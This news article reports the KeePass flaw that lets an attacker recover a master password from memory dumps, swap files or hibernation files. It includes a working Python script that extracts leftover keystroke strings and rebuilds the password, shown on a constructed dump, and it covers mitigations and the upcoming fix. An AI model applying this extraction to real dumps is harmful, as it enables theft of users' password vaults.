KeePass: a major vulnerability could let an attacker take control of your passwords


Alexander Boero

May 19, 2023 at 4:00 p.m.


[Image: password security, © Titima Ongkantong / Shutterstock]

The KeePass password manager is affected by a vulnerability that allows an attacker to recover the master password of affected users.

If even password managers suffer from serious security flaws, where is the world headed? After the (many) setbacks of LastPass, this time it is its competitor KeePass, which is supposed to keep its entire database encrypted, that finds itself in the spotlight. The nearly 20-year-old free and open source password manager is hit by a critical flaw, disclosed by a researcher on GitHub.

An exploitable flaw on Windows, macOS and Linux

The flaw in question makes it possible to recover the master password, which is crucial for every user of the tool: it is the single secret that unlocks the entire database, including passwords, usernames, URLs and so on.

Bear in mind that this encrypted database can only be unlocked with the master password, so it is best to keep it out of the wrong hands: an attacker who obtains it has the keys to a real treasure chest.

The vulnerability allows recovery of the plaintext master password from a memory dump (a RAM dump), even when the workspace is locked or KeePass is no longer running, explain the Malwarebytes specialists in their analysis of the flaw, which can be exploited on Windows, macOS and Linux alike. The dump does not have to be a live capture of the KeePass process: a system swap (page) file, a hibernation file or an image of the whole machine's RAM can contain the same leftover data.
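To see what "recover the master password from a memory dump" means in practice, here is an added example written for this article; it is neither the researcher's proof of concept nor KeePass code. It follows the leftover-string shape described in the public write-ups of the flaw: every keystroke in the password box leaves a managed string made of masking characters (assumed here to be U+25CF, the black circle KeePass displays, encoded as UTF-16LE) followed by the character that was just typed. The script scans a constructed memory image for those strings and reassembles the password; the password, the dump and the junk around it are all constructed, and the first character comes out as "?" because the first keystroke leaves no masking character to search for.

```python
"""Reassemble a typed password from leftover masking strings in a memory image.

Added illustration of the mechanism reported for CVE-2023-32784, not the
researcher's proof of concept. Assumption: for the i-th keystroke (counting
from 0), a string of i masking characters followed by the typed character
survives in process memory, a swap file or a hibernation file.
"""
import re
from collections import defaultdict

# Masking character assumed to be left behind (U+25CF, black circle).
PLACEHOLDER = "\u25cf"
PLACEHOLDER_U16 = PLACEHOLDER.encode("utf-16-le")  # b"\xcf\x25" in memory

# One or more masking units followed by exactly one UTF-16 code unit.
LEFTOVER_RE = re.compile(b"((?:" + re.escape(PLACEHOLDER_U16) + b")+)(..)", re.DOTALL)


def build_sample_dump(password: str) -> bytes:
    """Constructed stand-in for a process or RAM dump.

    The first keystroke leaves only the character itself, which is
    indistinguishable from any other one-character string, so it is omitted
    here exactly as it is lost in a real dump.
    """
    chunks = [b"\x00" * 32, "unrelated managed string".encode("utf-16-le"), b"\x00\x00"]
    for i in range(1, len(password)):
        leftover = (PLACEHOLDER * i + password[i]).encode("utf-16-le")
        chunks.append(leftover + b"\x00\x00")       # strings are NUL-terminated in memory
        chunks.append(bytes([0x41 + i % 5]) * 7)     # odd-length junk breaks 2-byte alignment
    chunks.append(PLACEHOLDER_U16 + b"\x00\x00")     # stray mask with no character: must be ignored
    return b"".join(chunks)


def recover_candidates(dump: bytes) -> dict[int, list[str]]:
    """Map each password position (index of the typed character) to the distinct
    characters seen right after a run of that many masking characters."""
    found: dict[int, list[str]] = defaultdict(list)
    for m in LEFTOVER_RE.finditer(dump):
        position = len(m.group(1)) // 2            # number of masks == index of the keystroke
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch == "\ufffd" or not ch.isprintable():
            continue                               # terminator, junk or half a surrogate pair
        if ch not in found[position]:
            found[position].append(ch)
    return dict(found)


def reconstruct(dump: bytes) -> str:
    """Best guess: '?' for the unrecoverable first character, '{a|b}' where
    several candidates compete at one position (for example a typo that was
    backspaced), '_' for a position with no leftover at all."""
    cands = recover_candidates(dump)
    if not cands:
        return ""
    out = ["?"]
    for pos in range(1, max(cands) + 1):
        chars = cands.get(pos, [])
        if len(chars) == 1:
            out.append(chars[0])
        elif chars:
            out.append("{" + "|".join(chars) + "}")
        else:
            out.append("_")
    return "".join(out)


if __name__ == "__main__":
    print(reconstruct(build_sample_dump("Tr0ub4dor&3")))   # ?r0ub4dor&3
```

The search is byte-oriented on purpose: a swap or hibernation file gives no guarantee that the string starts on a 2-byte boundary, so the pattern is matched at any offset and only the decoded character is sanity-checked. A missing first character is not much of a defence, since an attacker who has everything else can guess it in at most a few hundred tries.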

[Image: password manager, © Shutterstock]

A vulnerability that will only be corrected this summer

Only the first character of the password cannot be recovered. Despite the real severity of the flaw, there is no need to panic, according to the specialists. If you use KeePass you risk nothing, a priori, because the attacker must first have compromised your device, or obtained a memory image of it. And while the researchers call for caution, they also point out that there are several ways to guard against this vulnerability.

One of them is to use a physical security key, a YubiKey for example, which keeps the master password out of the text box: a secret that is never typed there never ends up in system memory in this form.

The latest available version of KeePass (2.53.1) is unfortunately also vulnerable. The flaw will be fixed in version 2.54, which KeePass is expected to release this summer, probably sometime in July. Users will have to be patient, the application's developers explaining that they are also working on other security-related features. Note that a fix only stops new leaks: copies that have already landed in a swap or hibernation file stay there until those files are wiped or overwritten.

Source: GitHub, Malwarebytes Labs
